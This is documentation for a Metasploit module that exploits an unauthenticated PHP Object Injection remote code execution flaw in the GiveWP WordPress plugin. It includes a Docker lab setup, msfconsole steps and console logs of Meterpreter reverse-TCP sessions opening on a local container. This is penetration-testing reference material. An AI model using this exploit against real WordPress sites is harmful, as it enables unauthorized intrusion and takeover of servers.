metasploit-gs/documentation/modules/exploit/multi/http/wp_givewp_rce.md

Vulnerable Application

This Metasploit module exploits an unauthenticated PHP Object Injection vulnerability in the GiveWP plugin for WordPress (versions <= 3.14.1). The vulnerability is present in the 'give_title' parameter, allowing attackers to inject a crafted PHP object leading to remote code execution (RCE) when combined with a suitable POP chain.

Setup

1. Docker Compose Setup: Create the following docker-compose.yml file to set up a vulnerable WordPress environment:

services:
  db:
    image: mysql:8.0.27
    command: '--default-authentication-plugin=mysql_native_password'
    restart: always
    environment:
      - MYSQL_ROOT_PASSWORD=somewordpress
      - MYSQL_DATABASE=wordpress
      - MYSQL_USER=wordpress
      - MYSQL_PASSWORD=wordpress
    expose:
      - 3306
      - 33060

  wordpress:
    image: wordpress:6.3.2
    ports:
      - "80:80"
    restart: always
    environment:
      - WORDPRESS_DB_HOST=db
      - WORDPRESS_DB_USER=wordpress
      - WORDPRESS_DB_PASSWORD=wordpress
      - WORDPRESS_DB_NAME=wordpress
volumes:
  db_data:

1. Run Docker: docker compose up
2. Access the WordPress instance at http://127.0.0.1 and complete the installation process.
3. Download and Install Vulnerable GiveWP Plugin:

• Download the plugin: GiveWP 3.16.1
• Unzip the plugin and copy it to the Docker container:

docker compose cp give wordpress:/var/www/html/wp-content/plugins

• Access the WordPress instance at http://localhost and activate the GiveWP plugin via the admin dashboard.

4. Create a Donation Form:

• Navigate to the "Forms" section within the GiveWP plugin and click on "Add Form."
• Select any form.
• Configure the form as needed, then publish it.

Note: Depending on the vulnerability you want to test, using an older version like 3.14.1 may also be applicable.

Options

No specific options need to be configured.

Verification Steps

1. Start msfconsole.
2. Use the module with use exploit/multi/http/wp_givewp_rce.
3. Set RHOSTS, RPORT, and the necessary WordPress-specific options.
4. Run the exploit.
5. Gain a Meterpreter session.

Scenarios

GiveWP Plugin version: 3.14.1 (Dockerized WordPress Version 6.5.3)

Using cmd/linux/http/x64/meterpreter/reverse_tcp:

msf6 exploit(multi/http/wp_givewp_rce) > run http://127.0.0.1:5555

[*] Started reverse TCP handler on 192.168.1.36:1337 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.5.3
[+] Detected GiveWP Plugin version: 3.14.1
[+] Vulnerable to both CVE-2024-5932 and CVE-2024-8353 (bypass).
[+] The target appears to be vulnerable.
[+] Successfully retrieved form list. Available Form IDs: 45
[*] Using Form ID: 45 for exploitation.
[*] Sending stage (3045380 bytes) to 172.18.0.3
[*] Meterpreter session 5 opened (192.168.1.36:1337 -> 172.18.0.3:45656) at 2024-10-02 19:51:31 +0200

meterpreter > sysinfo 
Computer     : 172.18.0.3
OS           : Debian 11.8 (Linux 5.15.0-122-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

GiveWP Plugin version: 3.16.1 (Dockerized WordPress Version 6.5.3)

msf6 exploit(multi/http/wp_givewp_rce) > run http://127.0.0.1:5555

[*] Started reverse TCP handler on 192.168.1.36:1337 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.5.3
[+] Detected GiveWP Plugin version: 3.16.1
[+] Vulnerable to CVE-2024-8353 (bypass).
[+] The target appears to be vulnerable.
[+] Successfully retrieved form list. Available Form IDs: 38
[*] Using Form ID: 38 for exploitation.
[*] Sending stage (3045380 bytes) to 172.18.0.3
[*] Meterpreter session 4 opened (192.168.1.36:1337 -> 172.18.0.3:49380) at 2024-10-02 19:49:39 +0200

meterpreter > sysinfo 
Computer     : 172.18.0.3
OS           : Debian 11.8 (Linux 5.15.0-122-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >